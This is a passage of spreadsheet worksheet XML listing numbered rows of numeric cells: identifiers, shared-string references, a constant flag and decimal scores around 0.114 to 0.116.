      </c>
    </row>
    <row r="17753" ht="15.75" customHeight="1">
      <c r="A17753" s="1">
        <v>33101.0</v>
      </c>
      <c r="B17753" s="2">
        <v>6958288.0</v>
      </c>
      <c r="C17753" s="2" t="s">
        <v>17119</v>
      </c>
      <c r="D17753" s="2">
        <v>1.0</v>
      </c>
      <c r="E17753" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17753" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17754" ht="15.75" customHeight="1">
      <c r="A17754" s="1">
        <v>33844.0</v>
      </c>
      <c r="B17754" s="2">
        <v>9013437.0</v>
      </c>
      <c r="C17754" s="2" t="s">
        <v>17120</v>
      </c>
      <c r="D17754" s="2">
        <v>1.0</v>
      </c>
      <c r="E17754" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17754" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17755" ht="15.75" customHeight="1">
      <c r="A17755" s="1">
        <v>34059.0</v>
      </c>
      <c r="B17755" s="2">
        <v>9610078.0</v>
      </c>
      <c r="C17755" s="2" t="s">
        <v>17121</v>
      </c>
      <c r="D17755" s="2">
        <v>1.0</v>
      </c>
      <c r="E17755" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17755" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17756" ht="15.75" customHeight="1">
      <c r="A17756" s="1">
        <v>2522.0</v>
      </c>
      <c r="B17756" s="2">
        <v>3.4033567E7</v>
      </c>
      <c r="C17756" s="2" t="s">
        <v>17122</v>
      </c>
      <c r="D17756" s="2">
        <v>1.0</v>
      </c>
      <c r="E17756" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17756" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="17757" ht="15.75" customHeight="1">
      <c r="A17757" s="1">
        <v>16231.0</v>
      </c>
      <c r="B17757" s="2">
        <v>4.573777E7</v>
      </c>
      <c r="C17757" s="2" t="s">
        <v>17123</v>
      </c>
      <c r="D17757" s="2">
        <v>1.0</v>
      </c>
      <c r="E17757" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17757" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="17758" ht="15.75" customHeight="1">
      <c r="A17758" s="1">
        <v>20960.0</v>
      </c>
      <c r="B17758" s="2">
        <v>1.6675575E7</v>
      </c>
      <c r="C17758" s="2" t="s">
        <v>17124</v>
      </c>
      <c r="D17758" s="2">
        <v>1.0</v>
      </c>
      <c r="E17758" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17758" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="17759" ht="15.75" customHeight="1">
      <c r="A17759" s="1">
        <v>31001.0</v>
      </c>
      <c r="B17759" s="2">
        <v>4.7618399E7</v>
      </c>
      <c r="C17759" s="2" t="s">
        <v>17125</v>
      </c>
      <c r="D17759" s="2">
        <v>1.0</v>
      </c>
      <c r="E17759" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17759" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="17760" ht="15.75" customHeight="1">
      <c r="A17760" s="1">
        <v>31954.0</v>
      </c>
      <c r="B17760" s="2">
        <v>5310073.0</v>
      </c>
      <c r="C17760" s="2" t="s">
        <v>17126</v>
      </c>
      <c r="D17760" s="2">
        <v>1.0</v>
      </c>
      <c r="E17760" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17760" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="17761" ht="15.75" customHeight="1">
      <c r="A17761" s="1">
        <v>27567.0</v>
      </c>
      <c r="B17761" s="2">
        <v>2.2427935E7</v>
      </c>
      <c r="C17761" s="2" t="s">
        <v>17127</v>
      </c>
      <c r="D17761" s="2">
        <v>1.0</v>
      </c>
      <c r="E17761" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17761" s="2">
        <v>0.1161616161616162</v>
      </c>
    </row>
    <row r="17762" ht="15.75" customHeight="1">
      <c r="A17762" s="1">
        <v>20627.0</v>
      </c>
      <c r="B17762" s="2">
        <v>1.410177E7</v>
      </c>
      <c r="C17762" s="2" t="s">
        <v>17128</v>
      </c>
      <c r="D17762" s="2">
        <v>1.0</v>
      </c>
      <c r="E17762" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17762" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="17763" ht="15.75" customHeight="1">
      <c r="A17763" s="1">
        <v>21339.0</v>
      </c>
      <c r="B17763" s="2">
        <v>2.1115626E7</v>
      </c>
      <c r="C17763" s="2" t="s">
        <v>17129</v>
      </c>
      <c r="D17763" s="2">
        <v>1.0</v>
      </c>
      <c r="E17763" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17763" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="17764" ht="15.75" customHeight="1">
      <c r="A17764" s="1">
        <v>21533.0</v>
      </c>
      <c r="B17764" s="2">
        <v>2.3461096E7</v>
      </c>
      <c r="C17764" s="2" t="s">
        <v>17130</v>
      </c>
      <c r="D17764" s="2">
        <v>1.0</v>
      </c>
      <c r="E17764" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17764" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="17765" ht="15.75" customHeight="1">
      <c r="A17765" s="1">
        <v>32729.0</v>
      </c>
      <c r="B17765" s="2">
        <v>6008220.0</v>
      </c>
      <c r="C17765" s="2" t="s">
        <v>17131</v>
      </c>
      <c r="D17765" s="2">
        <v>1.0</v>
      </c>
      <c r="E17765" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17765" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="17766" ht="15.75" customHeight="1">
      <c r="A17766" s="1">
        <v>13874.0</v>
      </c>
      <c r="B17766" s="2">
        <v>3.6981907E7</v>
      </c>
      <c r="C17766" s="2" t="s">
        <v>17132</v>
      </c>
      <c r="D17766" s="2">
        <v>1.0</v>
      </c>
      <c r="E17766" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17766" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="17767" ht="15.75" customHeight="1">
      <c r="A17767" s="1">
        <v>21490.0</v>
      </c>
      <c r="B17767" s="2">
        <v>2.3060872E7</v>
      </c>
      <c r="C17767" s="2" t="s">
        <v>17018</v>
      </c>
      <c r="D17767" s="2">
        <v>1.0</v>
      </c>
      <c r="E17767" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17767" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="17768" ht="15.75" customHeight="1">
      <c r="A17768" s="1">
        <v>27715.0</v>
      </c>
      <c r="B17768" s="2">
        <v>2.3060871E7</v>
      </c>
      <c r="C17768" s="2" t="s">
        <v>17018</v>
      </c>
      <c r="D17768" s="2">
        <v>1.0</v>
      </c>
      <c r="E17768" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17768" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="17769" ht="15.75" customHeight="1">
      <c r="A17769" s="1">
        <v>29628.0</v>
      </c>
      <c r="B17769" s="2">
        <v>3.3701738E7</v>
      </c>
      <c r="C17769" s="2" t="s">
        <v>17133</v>
      </c>
      <c r="D17769" s="2">
        <v>1.0</v>
      </c>
      <c r="E17769" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17769" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="17770" ht="15.75" customHeight="1">
      <c r="A17770" s="1">
        <v>25778.0</v>
      </c>
      <c r="B17770" s="2">
        <v>1.4652074E7</v>
      </c>
      <c r="C17770" s="2" t="s">
        <v>17134</v>
      </c>
      <c r="D17770" s="2">
        <v>1.0</v>
      </c>
      <c r="E17770" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17770" s="2">
        <v>0.1160714285714285</v>
      </c>
    </row>
    <row r="17771" ht="15.75" customHeight="1">
      <c r="A17771" s="1">
        <v>9358.0</v>
      </c>
      <c r="B17771" s="2">
        <v>5.5678021E7</v>
      </c>
      <c r="C17771" s="2" t="s">
        <v>17135</v>
      </c>
      <c r="D17771" s="2">
        <v>1.0</v>
      </c>
      <c r="E17771" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17771" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="17772" ht="15.75" customHeight="1">
      <c r="A17772" s="1">
        <v>10385.0</v>
      </c>
      <c r="B17772" s="2">
        <v>8358885.0</v>
      </c>
      <c r="C17772" s="2" t="s">
        <v>17136</v>
      </c>
      <c r="D17772" s="2">
        <v>1.0</v>
      </c>
      <c r="E17772" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17772" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="17773" ht="15.75" customHeight="1">
      <c r="A17773" s="1">
        <v>18511.0</v>
      </c>
      <c r="B17773" s="2">
        <v>5.2995376E7</v>
      </c>
      <c r="C17773" s="2" t="s">
        <v>17137</v>
      </c>
      <c r="D17773" s="2">
        <v>1.0</v>
      </c>
      <c r="E17773" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17773" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="17774" ht="15.75" customHeight="1">
      <c r="A17774" s="1">
        <v>20222.0</v>
      </c>
      <c r="B17774" s="2">
        <v>1.076765E7</v>
      </c>
      <c r="C17774" s="2" t="s">
        <v>17138</v>
      </c>
      <c r="D17774" s="2">
        <v>1.0</v>
      </c>
      <c r="E17774" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17774" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="17775" ht="15.75" customHeight="1">
      <c r="A17775" s="1">
        <v>29090.0</v>
      </c>
      <c r="B17775" s="2">
        <v>3.0372217E7</v>
      </c>
      <c r="C17775" s="2" t="s">
        <v>17139</v>
      </c>
      <c r="D17775" s="2">
        <v>1.0</v>
      </c>
      <c r="E17775" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17775" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="17776" ht="15.75" customHeight="1">
      <c r="A17776" s="1">
        <v>29133.0</v>
      </c>
      <c r="B17776" s="2">
        <v>3.052636E7</v>
      </c>
      <c r="C17776" s="2" t="s">
        <v>17140</v>
      </c>
      <c r="D17776" s="2">
        <v>1.0</v>
      </c>
      <c r="E17776" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17776" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="17777" ht="15.75" customHeight="1">
      <c r="A17777" s="1">
        <v>31748.0</v>
      </c>
      <c r="B17777" s="2">
        <v>5214023.0</v>
      </c>
      <c r="C17777" s="2" t="s">
        <v>17141</v>
      </c>
      <c r="D17777" s="2">
        <v>1.0</v>
      </c>
      <c r="E17777" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17777" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="17778" ht="15.75" customHeight="1">
      <c r="A17778" s="1">
        <v>6846.0</v>
      </c>
      <c r="B17778" s="2">
        <v>4.963571E7</v>
      </c>
      <c r="C17778" s="2" t="s">
        <v>17142</v>
      </c>
      <c r="D17778" s="2">
        <v>1.0</v>
      </c>
      <c r="E17778" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17778" s="2">
        <v>0.1159003831417625</v>
      </c>
    </row>
    <row r="17779" ht="15.75" customHeight="1">
      <c r="A17779" s="1">
        <v>20857.0</v>
      </c>
      <c r="B17779" s="2">
        <v>1.5785045E7</v>
      </c>
      <c r="C17779" s="2" t="s">
        <v>17143</v>
      </c>
      <c r="D17779" s="2">
        <v>1.0</v>
      </c>
      <c r="E17779" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17779" s="2">
        <v>0.1159003831417625</v>
      </c>
    </row>
    <row r="17780" ht="15.75" customHeight="1">
      <c r="A17780" s="1">
        <v>662.0</v>
      </c>
      <c r="B17780" s="2">
        <v>2013113.0</v>
      </c>
      <c r="C17780" s="2" t="s">
        <v>17144</v>
      </c>
      <c r="D17780" s="2">
        <v>1.0</v>
      </c>
      <c r="E17780" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17780" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="17781" ht="15.75" customHeight="1">
      <c r="A17781" s="1">
        <v>7394.0</v>
      </c>
      <c r="B17781" s="2">
        <v>5.1100805E7</v>
      </c>
      <c r="C17781" s="2" t="s">
        <v>17145</v>
      </c>
      <c r="D17781" s="2">
        <v>1.0</v>
      </c>
      <c r="E17781" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17781" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="17782" ht="15.75" customHeight="1">
      <c r="A17782" s="1">
        <v>32412.0</v>
      </c>
      <c r="B17782" s="2">
        <v>5639405.0</v>
      </c>
      <c r="C17782" s="2" t="s">
        <v>17146</v>
      </c>
      <c r="D17782" s="2">
        <v>1.0</v>
      </c>
      <c r="E17782" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17782" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="17783" ht="15.75" customHeight="1">
      <c r="A17783" s="1">
        <v>9437.0</v>
      </c>
      <c r="B17783" s="2">
        <v>5.580628E7</v>
      </c>
      <c r="C17783" s="2" t="s">
        <v>17147</v>
      </c>
      <c r="D17783" s="2">
        <v>1.0</v>
      </c>
      <c r="E17783" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17783" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="17784" ht="15.75" customHeight="1">
      <c r="A17784" s="1">
        <v>10892.0</v>
      </c>
      <c r="B17784" s="2">
        <v>1.6567933E7</v>
      </c>
      <c r="C17784" s="2" t="s">
        <v>17148</v>
      </c>
      <c r="D17784" s="2">
        <v>1.0</v>
      </c>
      <c r="E17784" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17784" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="17785" ht="15.75" customHeight="1">
      <c r="A17785" s="1">
        <v>33674.0</v>
      </c>
      <c r="B17785" s="2">
        <v>8425292.0</v>
      </c>
      <c r="C17785" s="2" t="s">
        <v>17149</v>
      </c>
      <c r="D17785" s="2">
        <v>1.0</v>
      </c>
      <c r="E17785" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17785" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="17786" ht="15.75" customHeight="1">
      <c r="A17786" s="1">
        <v>26365.0</v>
      </c>
      <c r="B17786" s="2">
        <v>1.6880233E7</v>
      </c>
      <c r="C17786" s="2" t="s">
        <v>16740</v>
      </c>
      <c r="D17786" s="2">
        <v>1.0</v>
      </c>
      <c r="E17786" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17786" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="17787" ht="15.75" customHeight="1">
      <c r="A17787" s="1">
        <v>28581.0</v>
      </c>
      <c r="B17787" s="2">
        <v>2.6933153E7</v>
      </c>
      <c r="C17787" s="2" t="s">
        <v>17150</v>
      </c>
      <c r="D17787" s="2">
        <v>1.0</v>
      </c>
      <c r="E17787" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17787" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="17788" ht="15.75" customHeight="1">
      <c r="A17788" s="1">
        <v>10549.0</v>
      </c>
      <c r="B17788" s="2">
        <v>1.2629858E7</v>
      </c>
      <c r="C17788" s="2" t="s">
        <v>17151</v>
      </c>
      <c r="D17788" s="2">
        <v>1.0</v>
      </c>
      <c r="E17788" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17788" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="17789" ht="15.75" customHeight="1">
      <c r="A17789" s="1">
        <v>11087.0</v>
      </c>
      <c r="B17789" s="2">
        <v>1.8486557E7</v>
      </c>
      <c r="C17789" s="2" t="s">
        <v>17152</v>
      </c>
      <c r="D17789" s="2">
        <v>1.0</v>
      </c>
      <c r="E17789" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17789" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="17790" ht="15.75" customHeight="1">
      <c r="A17790" s="1">
        <v>16781.0</v>
      </c>
      <c r="B17790" s="2">
        <v>4.7737286E7</v>
      </c>
      <c r="C17790" s="2" t="s">
        <v>17153</v>
      </c>
      <c r="D17790" s="2">
        <v>1.0</v>
      </c>
      <c r="E17790" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17790" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="17791" ht="15.75" customHeight="1">
      <c r="A17791" s="1">
        <v>24047.0</v>
      </c>
      <c r="B17791" s="2">
        <v>9525806.0</v>
      </c>
      <c r="C17791" s="2" t="s">
        <v>17154</v>
      </c>
      <c r="D17791" s="2">
        <v>1.0</v>
      </c>
      <c r="E17791" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17791" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="17792" ht="15.75" customHeight="1">
      <c r="A17792" s="1">
        <v>26090.0</v>
      </c>
      <c r="B17792" s="2">
        <v>1.5666844E7</v>
      </c>
      <c r="C17792" s="2" t="s">
        <v>17155</v>
      </c>
      <c r="D17792" s="2">
        <v>1.0</v>
      </c>
      <c r="E17792" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17792" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="17793" ht="15.75" customHeight="1">
      <c r="A17793" s="1">
        <v>26695.0</v>
      </c>
      <c r="B17793" s="2">
        <v>1.8132693E7</v>
      </c>
      <c r="C17793" s="2" t="s">
        <v>17156</v>
      </c>
      <c r="D17793" s="2">
        <v>1.0</v>
      </c>
      <c r="E17793" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17793" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="17794" ht="15.75" customHeight="1">
      <c r="A17794" s="1">
        <v>27053.0</v>
      </c>
      <c r="B17794" s="2">
        <v>2.031696E7</v>
      </c>
      <c r="C17794" s="2" t="s">
        <v>17157</v>
      </c>
      <c r="D17794" s="2">
        <v>1.0</v>
      </c>
      <c r="E17794" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17794" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="17795" ht="15.75" customHeight="1">
      <c r="A17795" s="1">
        <v>27193.0</v>
      </c>
      <c r="B17795" s="2">
        <v>2.0904735E7</v>
      </c>
      <c r="C17795" s="2" t="s">
        <v>17158</v>
      </c>
      <c r="D17795" s="2">
        <v>1.0</v>
      </c>
      <c r="E17795" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17795" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="17796" ht="15.75" customHeight="1">
      <c r="A17796" s="1">
        <v>29685.0</v>
      </c>
      <c r="B17796" s="2">
        <v>3.4089018E7</v>
      </c>
      <c r="C17796" s="2" t="s">
        <v>17159</v>
      </c>
      <c r="D17796" s="2">
        <v>1.0</v>
      </c>
      <c r="E17796" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17796" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="17797" ht="15.75" customHeight="1">
      <c r="A17797" s="1">
        <v>31140.0</v>
      </c>
      <c r="B17797" s="2">
        <v>4889824.0</v>
      </c>
      <c r="C17797" s="2" t="s">
        <v>17160</v>
      </c>
      <c r="D17797" s="2">
        <v>1.0</v>
      </c>
      <c r="E17797" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17797" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="17798" ht="15.75" customHeight="1">
      <c r="A17798" s="1">
        <v>8142.0</v>
      </c>
      <c r="B17798" s="2">
        <v>5.3157533E7</v>
      </c>
      <c r="C17798" s="2" t="s">
        <v>17161</v>
      </c>
      <c r="D17798" s="2">
        <v>1.0</v>
      </c>
      <c r="E17798" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17798" s="2">
        <v>0.1155202821869489</v>
      </c>
    </row>
    <row r="17799" ht="15.75" customHeight="1">
      <c r="A17799" s="1">
        <v>13054.0</v>
      </c>
      <c r="B17799" s="2">
        <v>3.3185921E7</v>
      </c>
      <c r="C17799" s="2" t="s">
        <v>17162</v>
      </c>
      <c r="D17799" s="2">
        <v>1.0</v>
      </c>
      <c r="E17799" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17799" s="2">
        <v>0.1155202821869489</v>
      </c>
    </row>
    <row r="17800" ht="15.75" customHeight="1">
      <c r="A17800" s="1">
        <v>26173.0</v>
      </c>
      <c r="B17800" s="2">
        <v>1.6151137E7</v>
      </c>
      <c r="C17800" s="2" t="s">
        <v>17163</v>
      </c>
      <c r="D17800" s="2">
        <v>1.0</v>
      </c>
      <c r="E17800" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17800" s="2">
        <v>0.1153198653198653</v>
      </c>
    </row>
    <row r="17801" ht="15.75" customHeight="1">
      <c r="A17801" s="1">
        <v>33659.0</v>
      </c>
      <c r="B17801" s="2">
        <v>8402613.0</v>
      </c>
      <c r="C17801" s="2" t="s">
        <v>17164</v>
      </c>
      <c r="D17801" s="2">
        <v>1.0</v>
      </c>
      <c r="E17801" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17801" s="2">
        <v>0.1151960784313726</v>
      </c>
    </row>
    <row r="17802" ht="15.75" customHeight="1">
      <c r="A17802" s="1">
        <v>419.0</v>
      </c>
      <c r="B17802" s="2">
        <v>1.6812127E7</v>
      </c>
      <c r="C17802" s="2" t="s">
        <v>17165</v>
      </c>
      <c r="D17802" s="2">
        <v>1.0</v>
      </c>
      <c r="E17802" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17802" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="17803" ht="15.75" customHeight="1">
      <c r="A17803" s="1">
        <v>7582.0</v>
      </c>
      <c r="B17803" s="2">
        <v>5.1593591E7</v>
      </c>
      <c r="C17803" s="2" t="s">
        <v>17166</v>
      </c>
      <c r="D17803" s="2">
        <v>1.0</v>
      </c>
      <c r="E17803" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17803" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="17804" ht="15.75" customHeight="1">
      <c r="A17804" s="1">
        <v>12367.0</v>
      </c>
      <c r="B17804" s="2">
        <v>2.8790647E7</v>
      </c>
      <c r="C17804" s="2" t="s">
        <v>17167</v>
      </c>
      <c r="D17804" s="2">
        <v>1.0</v>
      </c>
      <c r="E17804" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17804" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="17805" ht="15.75" customHeight="1">
      <c r="A17805" s="1">
        <v>19391.0</v>
      </c>
      <c r="B17805" s="2">
        <v>5.5551623E7</v>
      </c>
      <c r="C17805" s="2" t="s">
        <v>17168</v>
      </c>
      <c r="D17805" s="2">
        <v>1.0</v>
      </c>
      <c r="E17805" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17805" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="17806" ht="15.75" customHeight="1">
      <c r="A17806" s="1">
        <v>6916.0</v>
      </c>
      <c r="B17806" s="2">
        <v>4.9857685E7</v>
      </c>
      <c r="C17806" s="2" t="s">
        <v>17169</v>
      </c>
      <c r="D17806" s="2">
        <v>1.0</v>
      </c>
      <c r="E17806" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17806" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="17807" ht="15.75" customHeight="1">
      <c r="A17807" s="1">
        <v>9382.0</v>
      </c>
      <c r="B17807" s="2">
        <v>5.5731114E7</v>
      </c>
      <c r="C17807" s="2" t="s">
        <v>17170</v>
      </c>
      <c r="D17807" s="2">
        <v>1.0</v>
      </c>
      <c r="E17807" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17807" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="17808" ht="15.75" customHeight="1">
      <c r="A17808" s="1">
        <v>10602.0</v>
      </c>
      <c r="B17808" s="2">
        <v>1.3612372E7</v>
      </c>
      <c r="C17808" s="2" t="s">
        <v>17171</v>
      </c>
      <c r="D17808" s="2">
        <v>1.0</v>
      </c>
      <c r="E17808" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17808" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="17809" ht="15.75" customHeight="1">
      <c r="A17809" s="1">
        <v>14002.0</v>
      </c>
      <c r="B17809" s="2">
        <v>3.7383699E7</v>
      </c>
      <c r="C17809" s="2" t="s">
        <v>17172</v>
      </c>
      <c r="D17809" s="2">
        <v>1.0</v>
      </c>
      <c r="E17809" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17809" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="17810" ht="15.75" customHeight="1">
      <c r="A17810" s="1">
        <v>14224.0</v>
      </c>
      <c r="B17810" s="2">
        <v>3.8283999E7</v>
      </c>
      <c r="C17810" s="2" t="s">
        <v>17173</v>
      </c>
      <c r="D17810" s="2">
        <v>1.0</v>
      </c>
      <c r="E17810" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17810" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="17811" ht="15.75" customHeight="1">
      <c r="A17811" s="1">
        <v>18388.0</v>
      </c>
      <c r="B17811" s="2">
        <v>5.2602398E7</v>
      </c>
      <c r="C17811" s="2" t="s">
        <v>17174</v>
      </c>
      <c r="D17811" s="2">
        <v>1.0</v>
      </c>
      <c r="E17811" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17811" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="17812" ht="15.75" customHeight="1">
      <c r="A17812" s="1">
        <v>25777.0</v>
      </c>
      <c r="B17812" s="2">
        <v>1.4652074E7</v>
      </c>
      <c r="C17812" s="2" t="s">
        <v>17175</v>
      </c>
      <c r="D17812" s="2">
        <v>1.0</v>
      </c>
      <c r="E17812" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17812" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="17813" ht="15.75" customHeight="1">
      <c r="A17813" s="1">
        <v>26308.0</v>
      </c>
      <c r="B17813" s="2">
        <v>1.6648597E7</v>
      </c>
      <c r="C17813" s="2" t="s">
        <v>17176</v>
      </c>
      <c r="D17813" s="2">
        <v>1.0</v>
      </c>
      <c r="E17813" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17813" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="17814" ht="15.75" customHeight="1">
      <c r="A17814" s="1">
        <v>30536.0</v>
      </c>
      <c r="B17814" s="2">
        <v>4.0546339E7</v>
      </c>
      <c r="C17814" s="2" t="s">
        <v>17177</v>
      </c>
      <c r="D17814" s="2">
        <v>1.0</v>
      </c>
      <c r="E17814" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17814" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="17815" ht="15.75" customHeight="1">
      <c r="A17815" s="1">
        <v>33994.0</v>
      </c>
      <c r="B17815" s="2">
        <v>9438332.0</v>
      </c>
      <c r="C17815" s="2" t="s">
        <v>17178</v>
      </c>
      <c r="D17815" s="2">
        <v>1.0</v>
      </c>
      <c r="E17815" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17815" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="17816" ht="15.75" customHeight="1">
      <c r="A17816" s="1">
        <v>237.0</v>
      </c>
      <c r="B17816" s="2">
        <v>1.4774794E7</v>
      </c>
      <c r="C17816" s="2" t="s">
        <v>17179</v>
      </c>
      <c r="D17816" s="2">
        <v>1.0</v>
      </c>
      <c r="E17816" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17816" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17817" ht="15.75" customHeight="1">
      <c r="A17817" s="1">
        <v>268.0</v>
      </c>
      <c r="B17817" s="2">
        <v>1.5175358E7</v>
      </c>
      <c r="C17817" s="2" t="s">
        <v>17180</v>
      </c>
      <c r="D17817" s="2">
        <v>1.0</v>
      </c>
      <c r="E17817" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17817" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17818" ht="15.75" customHeight="1">
      <c r="A17818" s="1">
        <v>310.0</v>
      </c>
      <c r="B17818" s="2">
        <v>1.5621246E7</v>
      </c>
      <c r="C17818" s="2" t="s">
        <v>17181</v>
      </c>
      <c r="D17818" s="2">
        <v>1.0</v>
      </c>
      <c r="E17818" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17818" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17819" ht="15.75" customHeight="1">
      <c r="A17819" s="1">
        <v>365.0</v>
      </c>
      <c r="B17819" s="2">
        <v>1.6274451E7</v>
      </c>
      <c r="C17819" s="2" t="s">
        <v>17182</v>
      </c>
      <c r="D17819" s="2">
        <v>1.0</v>
      </c>
      <c r="E17819" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17819" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17820" ht="15.75" customHeight="1">
